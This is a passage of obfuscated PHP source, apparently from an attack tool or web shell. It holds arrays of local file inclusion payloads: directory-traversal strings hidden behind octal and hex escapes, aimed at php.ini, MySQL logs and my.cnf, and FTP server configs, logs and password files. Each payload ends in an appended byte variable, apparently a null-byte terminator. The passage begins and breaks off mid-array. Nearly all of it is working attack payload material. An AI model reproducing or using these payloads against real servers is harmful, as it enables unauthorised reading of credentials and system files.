"\56\56\x2f\x2e\56\57\56\56\57\56\56\x2f\x2e\56\57\x2e\56\57\x2e\56\57\x2e\56\57\56\x2e\x2f\56\56\x2f\x2e\56\x2f\56\56\57\x2e\56\57\56\x2e\57\x2e\56\57\165\x73\x72\x2f\154\157\x63\141\x6c\x2f\x70\x68\160\65\57\x6c\x69\x62\57\160\x68\160\56\x69\156\151" . $byte1 . '', 11 => "\56\x2e\57\56\56\x2f\56\56\57\x2e\x2e\57\56\56\x2f\x2e\56\57\56\56\x2f\x2e\x2e\x2f\56\56\57\56\56\x2f\x2e\x2e\57\x2e\x2e\57\x2e\56\x2f\x2e\56\x2f\56\x2e\x2f\x75\163\162\57\x6c\x6f\143\141\154\x2f\141\x70\141\x63\150\x65\x2f\143\157\156\146\57\160\150\x70\56\x69\x6e\151" . $byte1 . '', 12 => "\56\56\x2f\x2e\56\57\x2e\56\x2f\x2e\56\57\56\56\x2f\x2e\56\57\56\x2e\57\56\56\x2f\56\56\57\x2e\56\x2f\x2e\56\x2f\x2e\x2e\57\56\x2e\x2f\56\x2e\57\56\56\x2f\x65\x74\x63\57\x70\x68\160\64\56\64\x2f\146\143\147\x69\x2f\160\x68\x70\56\x69\x6e\x69" . $byte1 . '', 13 => "\x2e\56\x2f\56\56\x2f\x2e\x2e\57\56\56\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\56\x2f\x2e\x2e\x2f\x2e\56\x2f\x2e\x2e\57\56\56\x2f\56\x2e\x2f\x2e\x2e\x2f\56\x2e\57\56\56\57\x65\x74\143\57\160\150\160\64\x2f\141\x70\x61\143\x68\145\57\160\x68\x70\x2e\x69\x6e\151" . $byte1 . '', 14 => "\56\56\x2f\x2e\56\x2f\x2e\56\x2f\56\56\57\x2e\56\57\56\x2e\57\x2e\x2e\57\x2e\x2e\x2f\56\x2e\57\x2e\x2e\x2f\x2e\56\57\x2e\x2e\57\56\56\57\56\56\57\x2e\x2e\x2f\x65\x74\x63\x2f\160\150\x70\64\57\x61\x70\141\x63\150\145\x32\57\160\x68\160\x2e\x69\156\151" . $byte1 . '', 15 => "\56\56\57\56\56\57\x2e\56\x2f\x2e\56\57\x2e\x2e\57\56\x2e\57\56\x2e\x2f\x2e\x2e\57\x2e\56\57\56\56\x2f\x2e\56\57\x2e\56\x2f\56\56\x2f\56\56\x2f\56\56\57\x65\x74\x63\x2f\160\150\160\65\x2f\x61\160\x61\x63\150\145\57\160\150\x70\x2e\151\156\x69" . $byte1 . '', 16 => "\56\56\57\56\x2e\57\56\x2e\57\56\56\x2f\56\56\x2f\x2e\x2e\57\56\x2e\57\x2e\x2e\x2f\x2e\56\x2f\56\56\x2f\56\56\x2f\56\x2e\x2f\56\56\x2f\56\56\57\56\x2e\x2f\145\164\x63\x2f\x70\150\x70\x35\57\x61\x70\x61\x63\150\145\x32\x2f\160\x68\160\x2e\x69\x6e\x69" . $byte1 . '', 17 => "\x2e\56\x2f\56\x2e\57\56\x2e\57\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\57\x2e\56\57\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\56\x2e\x2f\x2e\x2e\57\56\56\57\x2e\56\x2f\x2e\56\x2f\145\164\x63\57\160\150\160\57\160\x68\160\56\151\x6e\x69" . $byte1 . '', 18 => "\x2e\x2e\x2f\x2e\56\57\56\x2e\57\56\x2e\57\x2e\56\57\x2e\x2e\x2f\x2e\x2e\x2f\56\x2e\x2f\56\56\57\x2e\56\57\x2e\x2e\x2f\x2e\x2e\57\x2e\56\57\x2e\x2e\57\56\56\x2f\145\x74\x63\x2f\160\150\x70\57\x70\150\160\64\x2f\160\x68\160\56\151\x6e\151" . $byte1 . '', 19 => "\x2e\56\x2f\56\x2e\x2f\56\x2e\x2f\56\56\x2f\x2e\x2e\x2f\56\x2e\57\x2e\x2e\57\56\x2e\x2f\x2e\56\57\56\56\x2f\x2e\56\x2f\x2e\56\57\56\x2e\x2f\56\x2e\57\56\56\57\145\164\x63\x2f\160\x68\160\x2f\x61\160\x61\143\x68\145\x2f\160\x68\160\x2e\x69\x6e\x69" . $byte1 . '', 20 => "\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\57\56\56\x2f\x2e\56\57\x2e\x2e\57\x2e\x2e\x2f\56\x2e\x2f\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\57\56\x2e\57\56\56\57\56\56\x2f\56\x2e\57\x65\164\143\57\160\150\160\57\141\x70\x61\143\150\145\x32\57\160\150\x70\56\151\156\151" . $byte1 . '', 21 => "\56\x2e\x2f\56\x2e\x2f\x2e\x2e\57\56\56\x2f\56\x2e\x2f\56\56\x2f\x2e\x2e\x2f\x2e\56\x2f\x2e\56\x2f\x2e\56\57\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\x2e\56\57\56\x2e\x2f\x77\x65\142\x2f\143\157\x6e\146\x2f\160\x68\160\x2e\x69\156\151" . $byte1 . '', 22 => "\x2e\56\57\x2e\x2e\x2f\56\56\x2f\x2e\x2e\57\x2e\x2e\x2f\56\56\x2f\x2e\56\57\56\56\x2f\56\56\x2f\x2e\56\57\56\56\57\56\x2e\x2f\x2e\56\57\x2e\x2e\x2f\x2e\x2e\x2f\165\163\162\x2f\154\x6f\x63\x61\154\x2f\x5a\x65\156\x64\x2f\x65\164\143\x2f\160\x68\160\x2e\x69\x6e\x69" . $byte1 . '', 23 => "\56\x2e\57\x2e\x2e\x2f\x2e\x2e\57\56\x2e\x2f\56\x2e\x2f\x2e\56\x2f\56\56\57\56\56\57\56\56\x2f\x2e\56\57\56\56\x2f\56\x2e\x2f\56\x2e\57\56\x2e\57\56\x2e\x2f\157\x70\x74\x2f\x78\141\x6d\x70\160\57\145\164\143\x2f\160\x68\160\x2e\151\156\151" . $byte1 . '', 24 => "\56\56\x2f\x2e\56\x2f\56\56\x2f\56\56\57\x2e\56\x2f\x2e\56\x2f\x2e\56\x2f\56\56\x2f\56\56\57\56\56\x2f\x2e\56\x2f\56\56\x2f\x2e\x2e\57\56\56\x2f\x2e\56\57\x76\x61\162\57\154\157\x63\141\x6c\x2f\x77\167\167\57\143\x6f\156\x66\x2f\160\x68\160\56\x69\156\151" . $byte1 . '', 25 => "\56\x2e\57\56\56\x2f\x2e\56\57\56\x2e\x2f\x2e\x2e\x2f\x2e\56\x2f\x2e\x2e\57\56\x2e\57\56\x2e\x2f\56\56\x2f\56\56\x2f\x2e\x2e\57\x2e\x2e\57\x2e\56\x2f\x2e\x2e\x2f\145\x74\143\57\160\150\x70\57\143\x67\x69\x2f\x70\x68\x70\x2e\x69\x6e\x69" . $byte1 . '', 26 => "\x2e\x2e\x2f\56\x2e\57\x2e\x2e\x2f\x2e\x2e\x2f\56\56\57\56\x2e\x2f\56\x2e\x2f\56\x2e\x2f\56\x2e\57\x2e\x2e\57\x2e\x2e\57\56\x2e\57\x2e\x2e\57\56\x2e\57\56\x2e\x2f\x65\x74\143\x2f\x70\150\x70\x34\x2f\143\x67\x69\57\160\x68\x70\x2e\151\x6e\x69" . $byte1 . '', 27 => "\x2e\56\57\x2e\56\57\x2e\56\57\56\x2e\57\x2e\56\x2f\x2e\x2e\x2f\56\56\x2f\56\56\57\56\x2e\x2f\x2e\x2e\57\56\56\x2f\56\x2e\57\56\56\57\x2e\x2e\57\x2e\56\x2f\145\x74\143\x2f\160\x68\160\x35\57\143\x67\x69\57\x70\x68\x70\56\x69\156\151" . $byte1 . ''); $lfimysql = array(1 => "\56\x2e\57\x2e\x2e\x2f\56\x2e\57\56\56\57\x2e\56\x2f\56\56\57\x2e\56\x2f\56\x2e\57\x2e\x2e\57\x2e\56\57\x2e\x2e\x2f\56\56\x2f\56\56\x2f\56\56\57\x2e\56\57\166\x61\162\57\x6c\157\147\x2f\x6d\171\x73\161\x6c\57\155\x79\x73\161\154\x2d\142\151\x6e\56\154\x6f\x67" . $byte1 . '', 2 => "\56\x2e\57\56\56\x2f\x2e\56\57\x2e\56\x2f\56\56\x2f\x2e\56\x2f\56\56\x2f\x2e\x2e\x2f\x2e\x2e\57\56\56\57\x2e\x2e\57\x2e\x2e\x2f\56\56\57\x2e\x2e\x2f\56\x2e\57\166\141\162\57\x6c\157\147\57\x6d\171\x73\161\154\x2e\154\x6f\147" . $byte1 . '', 3 => "\x2e\56\57\56\x2e\x2f\x2e\56\x2f\56\56\x2f\x2e\56\x2f\x2e\x2e\x2f\x2e\56\57\56\56\x2f\x2e\56\57\x2e\x2e\x2f\56\x2e\x2f\56\x2e\x2f\x2e\56\57\56\x2e\57\56\56\x2f\x76\x61\162\57\154\157\x67\x2f\x6d\171\163\x71\154\x64\x65\x72\162\157\162\56\154\157\x67" . $byte1 . '', 4 => "\56\x2e\x2f\x2e\56\57\x2e\x2e\x2f\x2e\x2e\x2f\56\56\57\x2e\56\57\56\56\57\56\x2e\57\x2e\56\x2f\x2e\56\x2f\x2e\x2e\x2f\56\x2e\57\56\x2e\x2f\56\56\x2f\56\x2e\x2f\x76\141\162\x2f\x6c\x6f\x67\x2f\x6d\171\x73\x71\154\x2f\155\x79\x73\x71\154\56\154\x6f\x67" . $byte1 . '', 5 => "\x2e\x2e\57\56\56\x2f\56\x2e\x2f\56\56\x2f\x2e\x2e\x2f\56\x2e\57\x2e\x2e\x2f\56\56\57\56\x2e\x2f\56\56\x2f\x2e\56\57\56\x2e\x2f\x2e\x2e\x2f\56\x2e\x2f\x2e\56\x2f\x76\x61\x72\x2f\154\x6f\x67\57\155\171\x73\161\x6c\57\155\x79\163\x71\154\x2d\163\154\157\167\56\154\x6f\x67" . $byte1 . '', 6 => "\x2e\x2e\57\x2e\56\57\x2e\x2e\57\56\x2e\57\56\56\57\56\x2e\x2f\x2e\x2e\x2f\x2e\56\57\56\56\57\x2e\x2e\x2f\x2e\56\x2f\56\x2e\x2f\x2e\x2e\57\x2e\56\x2f\x2e\56\57\166\x61\x72\57\x6d\x79\x73\161\154\x2e\154\157\x67" . $byte1 . '', 7 => "\56\56\57\56\x2e\57\x2e\x2e\x2f\x2e\x2e\57\x2e\x2e\x2f\56\56\x2f\x2e\56\x2f\56\56\x2f\x2e\x2e\57\x2e\56\57\x2e\x2e\x2f\x2e\56\x2f\x2e\56\x2f\56\x2e\x2f\56\x2e\57\x76\x61\162\x2f\154\151\x62\x2f\155\171\x73\x71\154\x2f\x6d\x79\56\143\156\x66" . $byte1 . '', 8 => "\56\x2e\x2f\56\x2e\57\x2e\56\x2f\x2e\56\57\56\x2e\x2f\x2e\x2e\57\x2e\56\57\x2e\56\x2f\x2e\x2e\x2f\56\x2e\x2f\x2e\56\x2f\x2e\x2e\x2f\x2e\x2e\x2f\56\x2e\x2f\x2e\x2e\57\145\164\x63\x2f\x6d\171\163\161\x6c\x2f\x6d\171\56\143\156\146" . $byte1 . '', 9 => "\x2e\x2e\x2f\x2e\56\x2f\x2e\x2e\57\x2e\x2e\57\56\x2e\57\x2e\56\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\56\56\x2f\x2e\x2e\x2f\x2e\x2e\x2f\56\x2e\x2f\x2e\x2e\57\x2e\x2e\x2f\166\x61\x72\57\x6c\x6f\147\57\155\x79\163\x71\154\144\x2e\x6c\x6f\147" . $byte1 . '', 10 => "\56\56\x2f\56\56\57\56\56\57\x2e\x2e\57\x2e\56\x2f\x2e\56\x2f\x2e\56\57\x2e\x2e\x2f\56\56\x2f\x2e\x2e\57\x2e\56\x2f\x2e\x2e\x2f\x2e\56\x2f\56\x2e\57\x2e\56\x2f\x65\164\x63\57\x6d\171\x2e\143\x6e\x66" . $byte1 . ''); $lfiftp = array(1 => "\56\x2e\x2f\x2e\56\57\56\x2e\57\56\x2e\57\x2e\x2e\x2f\x2e\x2e\57\x2e\56\57\x2e\x2e\57\x2e\x2e\57\x2e\56\57\56\x2e\57\56\56\57\56\56\57\x2e\x2e\x2f\x2e\56\57\145\164\143\57\154\x6f\147\x72\157\x74\x61\164\145\x2e\144\x2f\160\162\x6f\146\x74\160\144" . $byte1 . '', 2 => "\56\56\57\56\56\57\x2e\x2e\57\56\x2e\57\56\56\x2f\56\56\57\56\x2e\x2f\x2e\x2e\57\56\x2e\57\56\56\x2f\56\x2e\x2f\56\x2e\57\x2e\x2e\x2f\x2e\x2e\57\56\56\57\x77\167\x77\x2f\154\x6f\x67\x73\57\x70\162\x6f\x66\x74\x70\144\x2e\163\171\x73\164\145\x6d\56\x6c\x6f\x67" . $byte1 . '', 3 => "\x2e\56\x2f\x2e\56\x2f\x2e\x2e\57\x2e\56\x2f\56\56\x2f\x2e\x2e\57\56\x2e\57\56\x2e\x2f\56\x2e\57\56\x2e\x2f\56\56\x2f\x2e\56\x2f\56\x2e\57\x2e\56\x2f\x2e\56\57\x76\x61\162\x2f\x6c\157\147\57\x70\162\157\x66\164\x70\144" . $byte1 . '', 4 => "\56\x2e\x2f\x2e\56\57\56\x2e\x2f\x2e\x2e\x2f\56\x2e\x2f\x2e\x2e\57\x2e\56\x2f\56\56\x2f\56\x2e\x2f\56\x2e\x2f\56\56\57\56\x2e\x2f\x2e\56\x2f\x2e\x2e\x2f\x2e\56\57\145\x74\143\x2f\160\x72\x6f\x66\164\x70\x2e\x63\x6f\x6e\x66" . $byte1 . '', 5 => "\x2e\56\x2f\56\56\57\56\x2e\57\56\x2e\57\x2e\56\x2f\x2e\56\x2f\x2e\56\x2f\x2e\56\x2f\x2e\x2e\x2f\56\x2e\57\x2e\x2e\57\x2e\x2e\57\x2e\56\57\x2e\x2e\x2f\56\56\57\145\x74\x63\x2f\160\x72\x6f\164\160\x64\57\x70\162\157\146\164\160\x64\56\143\157\156\x66" . $byte1 . '', 6 => "\56\56\x2f\x2e\56\57\56\56\x2f\56\x2e\x2f\56\x2e\57\56\x2e\57\56\x2e\57\56\56\x2f\x2e\56\x2f\x2e\56\x2f\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\x2e\x2e\57\x2e\x2e\57\145\164\143\57\x76\150\x63\163\62\57\x70\162\157\x66\x74\x70\144\x2f\x70\x72\x6f\146\164\x70\144\x2e\143\157\156\146" . $byte1 . '', 7 => "\x2e\x2e\x2f\56\56\57\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\x2f\56\56\57\56\x2e\57\x2e\56\57\x2e\x2e\x2f\56\x2e\x2f\x2e\x2e\x2f\x2e\56\x2f\x2e\x2e\57\x2e\x2e\x2f\56\x2e\57\145\164\x63\x2f\x70\162\157\x66\164\160\144\x2f\x6d\157\144\x75\154\145\x73\56\143\157\156\146" . $byte1 . '', 8 => "\x2e\x2e\x2f\56\56\x2f\56\x2e\x2f\x2e\x2e\x2f\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\56\57\x2e\56\x2f\56\x2e\x2f\x2e\56\57\56\x2e\57\56\56\57\56\56\x2f\56\x2e\x2f\x76\141\162\x2f\154\x6f\147\57\x76\x73\x66\x74\160\144\x2e\x6c\x6f\x67" . $byte1 . '', 9 => "\x2e\x2e\57\x2e\x2e\x2f\56\x2e\57\56\x2e\57\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\x2e\x2e\x2f\56\x2e\57\x2e\x2e\57\x2e\x2e\x2f\x2e\56\57\x2e\56\x2f\x2e\56\57\x2e\x2e\x2f\145\x74\143\57\x76\163\146\x74\160\x64\x2e\143\150\x72\157\x6f\x74\137\154\x69\163\x74" . $byte1 . '', 10 => "\56\x2e\57\56\56\57\56\56\x2f\x2e\x2e\57\x2e\x2e\57\x2e\x2e\57\x2e\56\x2f\x2e\56\57\56\56\x2f\x2e\x2e\57\56\56\x2f\x2e\x2e\x2f\x2e\56\57\56\x2e\x2f\x2e\56\57\145\x74\143\57\x6c\157\147\162\x6f\x74\141\x74\x65\56\x64\x2f\166\163\146\x74\160\x64\x2e\154\x6f\147" . $byte1 . '', 11 => "\56\56\57\x2e\x2e\x2f\56\56\57\56\x2e\x2f\x2e\56\x2f\56\x2e\x2f\x2e\x2e\57\x2e\x2e\x2f\x2e\56\57\56\x2e\x2f\56\56\57\x2e\56\x2f\x2e\56\57\56\x2e\57\56\x2e\57\x65\164\143\x2f\x76\163\x66\x74\x70\x64\x2f\166\x73\146\164\160\144\x2e\143\x6f\156\x66" . $byte1 . '', 12 => "\x2e\x2e\57\x2e\56\x2f\56\x2e\x2f\x2e\56\57\x2e\x2e\57\56\x2e\57\x2e\56\57\56\56\x2f\56\x2e\57\56\56\57\56\x2e\x2f\56\56\57\56\56\x2f\x2e\56\x2f\56\x2e\57\145\164\x63\x2f\x76\163\146\164\x70\144\x2e\x63\157\x6e\x66" . $byte1 . '', 13 => "\x2e\x2e\x2f\x2e\56\x2f\x2e\56\57\56\56\57\x2e\x2e\x2f\x2e\56\x2f\56\56\x2f\x2e\x2e\x2f\56\56\x2f\56\x2e\x2f\x2e\x2e\x2f\x2e\56\x2f\x2e\x2e\57\x2e\x2e\57\x2e\x2e\x2f\x65\164\143\57\143\150\x72\x6f\x6f\164\125\x73\145\162\x73" . $byte1 . '', 14 => "\x2e\56\x2f\56\x2e\57\56\x2e\57\x2e\56\x2f\x2e\56\57\56\56\x2f\x2e\56\57\x2e\56\x2f\56\x2e\x2f\x2e\56\57\x2e\56\57\x2e\x2e\57\x2e\x2e\57\56\56\x2f\x2e\x2e\x2f\x76\141\162\x2f\154\157\147\57\170\146\x65\x72\x6c\157\147" . $byte1 . '', 15 => "\56\x2e\x2f\x2e\56\x2f\56\x2e\57\56\x2e\57\56\x2e\x2f\56\x2e\x2f\56\56\57\56\x2e\57\56\56\x2f\56\56\x2f\x2e\x2e\57\x2e\x2e\x2f\x2e\56\57\56\x2e\x2f\56\56\57\166\x61\x72\x2f\x61\144\155\x2f\154\x6f\x67\57\x78\146\x65\x72\x6c\157\x67" . $byte1 . '', 16 => "\x2e\56\x2f\x2e\x2e\57\x2e\56\57\56\x2e\57\x2e\x2e\57\x2e\56\x2f\x2e\x2e\57\56\56\57\56\56\57\56\56\x2f\56\56\57\56\x2e\x2f\x2e\x2e\x2f\x2e\56\57\x2e\56\57\x65\x74\143\57\167\x75\x2d\146\x74\160\x64\57\x66\x74\x70\141\143\143\x65\x73\x73" . $byte1 . '', 17 => "\x2e\56\x2f\56\56\57\x2e\x2e\x2f\56\56\x2f\x2e\56\57\56\x2e\57\56\x2e\x2f\x2e\x2e\57\x2e\x2e\x2f\56\x2e\57\56\x2e\x2f\56\x2e\57\56\56\x2f\x2e\56\x2f\56\x2e\57\145\x74\x63\x2f\x77\165\55\146\x74\160\144\x2f\x66\x74\160\150\157\x73\x74\x73" . $byte1 . '', 18 => "\x2e\x2e\x2f\56\56\x2f\56\x2e\57\x2e\56\x2f\56\56\x2f\56\56\57\x2e\x2e\57\x2e\x2e\57\x2e\56\57\x2e\x2e\x2f\x2e\x2e\x2f\56\x2e\57\x2e\x2e\x2f\x2e\56\57\x2e\x2e\x2f\145\x74\x63\57\167\165\x2d\x66\x74\x70\144\57\146\164\160\165\163\x65\x72\163" . $byte1 . '', 19 => "\x2e\56\x2f\56\56\x2f\x2e\56\57\x2e\56\57\56\x2e\x2f\56\56\x2f\x2e\56\57\56\56\57\56\x2e\57\56\56\57\56\x2e\x2f\56\56\57\56\56\x2f\56\56\57\56\56\57\165\163\162\x2f\163\142\x69\156\x2f\160\165\x72\145\x2d\x63\157\x6e\146\151\147\56\x70\x6c" . $byte1 . '', 20 => "\x2e\56\57\56\x2e\57\56\56\57\x2e\x2e\57\56\56\57\56\x2e\57\x2e\x2e\57\56\56\57\56\56\57\x2e\x2e\57\x2e\56\x2f\x2e\56\x2f\56\56\x2f\56\x2e\x2f\x2e\x2e\x2f\165\x73\162\57\145\164\143\57\x70\x75\x72\145\x2d\146\164\160\144\x2e\x63\x6f\x6e\x66" . $byte1 . '', 21 => "\x2e\56\57\56\x2e\x2f\56\56\x2f\x2e\x2e\57\x2e\56\57\x2e\x2e\57\x2e\56\x2f\x2e\56\57\56\56\x2f\56\x2e\x2f\56\56\57\x2e\56\57\x2e\x2e\x2f\56\56\57\x2e\x2e\57\x65\164\x63\57\160\x75\162\145\x2d\x66\x74\160\144\57\160\165\162\145\x2d\x66\x74\160\144\x2e\143\157\x6e\x66" . $byte1 . '', 22 => "\x2e\x2e\57\56\x2e\57\x2e\56\57\56\56\x2f\56\56\x2f\56\x2e\x2f\x2e\56\57\x2e\56\x2f\x2e\56\x2f\56\56\x2f\56\56\x2f\56\x2e\57\56\x2e\57\x2e\x2e\x2f\x2e\56\x2f\x75\x73\162\57\x6c\x6f\143\141\x6c\x2f\x65\164\143\x2f\160\x75\162\x65\x2d\x66\164\160\x64\x2e\143\x6f\156\x66" . $byte1 . '', 23 => "\x2e\x2e\x2f\x2e\56\57\56\56\57\x2e\56\x2f\x2e\x2e\57\x2e\56\57\x2e\56\57\56\x2e\x2f\56\x2e\x2f\56\x2e\x2f\x2e\56\57\56\56\x2f\x2e\x2e\57\56\x2e\x2f\56\56\57\165\x73\x72\x2f\x6c\157\x63\141\154\57\145\x74\143\57\x70\x75\162\145\x66\164\160\x64\56\160\x64\142" . $byte1 . '', 24 => "\56\56\57\x2e\56\x2f\x2e\56\57\x2e\x2e\57\56\x2e\57\56\56\57\x2e\56\x2f\x2e\x2e\57\56\x2e\x2f\x2e\56\57\x2e\x2e\57\56\56\x2f\56\56\57\56\56\x2f\56\x2e\x2f\x75\x73\x72\57\x6c\157\143\x61\x6c\x2f\x70\165\x72\x65\x66\164\160\x64\x2f\145\164\x63\57\160\165\162\145\146\164\160\144\56\160\x64\142" . $byte1 . '', 25 => "\56\x2e\x2f\x2e\56\57\x2e\x2e\57\56\56\57\56\56\x2f\x2e\x2e\57\x2e\x2e\57\x2e\56\57\x2e\x2e\x2f\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\x2e\56\x2f\x2e\56\x2f\x2e\56\57\165\x73\x72\57\x6c\x6f\x63\x61\x6c\x2f\x70\165\162\145\146\164\x70\144\x2f\x73\142\x69\x6e\x2f\x70\165\x72\x65\55\143\157\156\146\151\147\56\160\154" . $byte1 . '', 26 => "\56\56\57\56\56\x2f\x2e\56\x2f\x2e\x2e\57\x2e\x2e\x2f\x2e\56\x2f\56\x2e\x2f\x2e\56\57\56\x2e\57\x2e\56\57\56\56\x2f\56\56\57\x2e\56\57\x2e\x2e\57\56\x2e\x2f\165\163\162\x2f\154\x6f\143\141\x6c\x2f\x70\165\x72\x65\146\164\x70\144\57\x65\x74\x63\57\x70\x75\162\145\55\x66\164\x70\x64\56\x63\x6f\x6e\146" . $byte1 . '', 27 => "\x2e\56\x2f\x2e\56\57\x2e\x2e\x2f\x2e\x2e\x2f\x2e\56\x2f\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\57\x2e\x2e\57\56\x2e\57\56\x2e\x2f\x2e\56\x2f\56\56\57\56\56\x2f\x2e\56\x2f\145\x74\143\x2f\160\165\x72\x65\x2d\146\164\x70\144\x2e\x63\157\x6e\146" . $byte1 . '', 28 => "\56\x2e\x2f\56\x2e\57\56\x2e\x2f\x2e\56\x2f\56\56\x2f\56\56\x2f\56\56\x2f\x2e\56\x2f\x2e\56\57\x2e\x2e\x2f\x2e\56\57\x2e\x2e\57\56\x2e\57\56\56\x2f\x2e\56\x2f\x65\x74\143\x2f\160\x75\162\145\55\x66\164\160\x64\x2f\x70\165\162\x65\55\146\x74\160\144\56\160\144\142" . $byte1 . '', 29 => "\x2e\x2e\57\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\56\56\x2f\56\x2e\x2f\x2e\56\x2f\x2e\56\x2f\x2e\56\x2f\x2e\x2e\x2f\56\56\57\56\x2e\x2f\56\x2e\x2f\56\x2e\x2f\x2e\x2e\57\145\x74\x63\57\160\x75\162\145\146\x74\160\144\56\x70\x64\x62" . $byte1 . '', 30 => "\56\x2e\57\56\56\57\56\x2e\x2f\x2e\56\x2f\56\x2e\57\x2e\56\x2f\x2e\x2e\57\x2e\56\x2f\56\x2e\x2f\56\56\57\56\x2e\x2f\x2e\x2e\57\56\56\57\56\x2e\57\x2e\x2e\x2f\x65\164\x63\x2f\160\x75\x72\145\x66\164\x70\x64\56\160\x61\x73\163\x77\x64" . $byte1 . '', 31 => "\56\x2e\57\x2e\56\x2f\x2e\56\x2f\56\56\57\56\56\x2f\56\x2e\57\x2e\56\57\56\x2e\57\x2e\56\x2f\56\x2e\57\x2e\56\x2f\56\x2e\x2f\56\x2e\x2f\56\56\x2f\56\x2e\x2f\145\x74\x63\57\x70\165\x72\145\55\x66\164\x70\144\x2f\x70\x75\162\145\146\x74\160\144\56\x70\x64\x62" . $byte1 . '', 32 => "\56\56\x2f\56\56\57\x2e\56\x2f\x2e\56\57\x2e\x2e\57\x2e\x2e\x2f\56\x2e\x2f\56\56\57\x2e\56\57\x2e\56\57\x2e\x2e\x2f\x2e\56\57\56\56\57\56\x2e\57\x2e\56\x2f\165\x73\x72\57\x70\x6f\162\164\163\x2f\146\x74\x70\57\x70\165\x72\x65\x2d\x66\164\160\x64\57" . $byte1 . '', 33 => "\x2e\56\x2f\x2e\56\57\x2e\56\x2f\56\56\57\x2e\56\57\56\x2e\x2f\x2e\x2e\x2f\x2e\56\x2f\x2e\x2e\x2f\x2e\56\57\56\56\x2f\x2e\56\x2f\x2e\x2e\57\x2e\56\x2f\x2e\x2e\x2f\165\163\x72\x2f\x70\157\x72\164\x73\57\156\x65\x74\57\x70\x75\x72\x65\x2d\x66\164\x70\x64\x2f" . $byte1 . '', 34 => "\x2e\x2e\57\56\56\57\x2e\56\57\56\56\57\56\56\x2f\56\x2e\57\56\56\57\x2e\x2e\57\x2e\56\57\56\56\57\x2e\56\x2f\56\x2e\x2f\x2e\56\x2f\x2e\56\57\56\56\57\x75\x73\x72\57\160\153\x67\163\x72\x63\57\x6e\x65\164\x2f\x70\x75\162\x65\146\x74\160\x64\x2f" . $byte1 . '', 35 => "\56\56\x2f\x2e\56\57\x2e\x2e\57\x2e\56\x2f\56\56\x2f\56\56\x2f\56\56\57\56\56\x2f\x2e\x2e\57\x2e\x2e\x2f\56\56\57\56\56\x2f\x2e\x2e\x2f\x2e\x2e\57\56\x2e\57\x75\163\162\57\160\157\x72\x74\x73\x2f\143\x6f\156\164\162\151\x62\57\160\x75\x72\x65\x2d\146\164\x70\x64\x2f" . $byte1 . '', 36 => "\56\56\57\x2e\56\x2f\56\x2e\57\x2e\56\57\56\x2e\x2f\56\x2e\x2f\x2e\56\57\56\56\x2f\x2e\x2e\x2f\x2e\56\57\56\x2e\57\x2e\x2e\57\x2e\x2e\x2f\56\56\x2f\56\x2e\57\x76\141\x72\x2f\x6c\x6f\147\57\160\165\x72\145\55\146\164\160\x64\57\160\x75\162\145\55\x66\x74\160\x64\56\154\157\147" . $byte1 . '', 37 => "\x2e\x2e\x2f\x2e\56\x2f\x2e\56\x2f\56\x2e\57\56\56\x2f\56\56\57\56\56\57\56\56\57\x2e\x2e\57\x2e\56\x2f\x2e\56\x2f\x2e\56\x2f\x2e\x2e\x2f\56\x2e\x2f\x2e\56\57\154\157\147\163\x2f\x70\165\162\145\x2d\146\x74\x70\x64\56\x6c\157\x67" . $byte1 . '', 38 => "\x2e\56\x2f\x2e\x2e\57\x2e\x2e\x2f\x2e\56\57\x2e\x2e\x2f\x2e\x2e\57\x2e\x2e\x2f\x2e\56\57\x2e\56\x2f\56\x2e\57\56\x2e\x2f\x2e\56\x2f\x2e\56\x2f\56\x2e\x2f\56\x2e\x2f\166\x61\x72\57\154\x6f\147\x2f\x70\x75\x72\x65\146\x74\160\x64\56\x6c\157\x67" . $byte1 . '', 39 => "\56\x2e\57\x2e\56\57\56\56\57\56\x2e\x2f\x2e\x2e\x2f\56\56\x2f\x2e\56\57\56\x2e\57\x2e\56\x2f\56\56\57\x2e\x2e\57\x2e\56\57\56\56\x2f\56\56\57\56\56\57\166\141\x72\57\154\157\x67\57\x66\x74\160\x2d\x70\x72\157\170\171\x2f\146\x74\x70\x2d\160\x72\x6f\x78\x79\56\x6c\x6f\147" . $byte1 . '', 40 => "\x2e\x2e\x2f\56\x2e\x2f\56\x2e\x2f\x2e\x2e\57\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\56\x2e\x2f\56\56\x2f\56\56\x2f\56\56\57\x2e\x2e\57\x2e\x2e\x2f\56\x2e\x2f\x2e\x2e\x2f\x76\x61\x72\57\x6c\x6f\147\x2f\x66\x74\x70\55\160\x72\x6f\x78\x79" . $byte1 . '', 41 => "\56\56\x2f\x2e\x2e\57\x2e\x2e\x2f\56\x2e\x2f\56\x2e\57\x2e\x2e\57\56\x2e\57\x2e\56\x2f\x2e\56\57\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\56\x2e\x2f\x2e\56\57\x2e\x2e\57\x76\x61\x72\57\x6c\x6f\x67\x2f\146\164\x70\154\x6f\147" . $byte1 . '', 42 => "\56\x2e\x2f\x2e\x2e\57\x2e\x2e\57\x2e\x2e\x2f\56\x2e\57\x2e\x2e\57\56\x2e\57\x2e\56\57\56\x2e\x2f\56\x2e\57\56\56\x2f\x2e\56\x2f\x2e\x2e\57\56\x2e\x2f\x2e\x2e\57\x65\x74\143\57\154\157\x67\162\157\x74\141\164\x65\x2e\144\57\x66\x74\x70" . $byte1 . '', 43 => "\56\x2e\57\x2e\56\57\x2e\x2e\x2f\56\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\56\56\x2f\56\56\x2f\56\56\57\x2e\x2e\57\56\x2e\57\56\56\x2f\x2e\x2e\x2f\x2e\x2e\57\x2e\x2e\x2f\145\x74\143\57\x66\164\x70\143\150\162\x6f\x6f\164" . $byte1 . '', 44 => 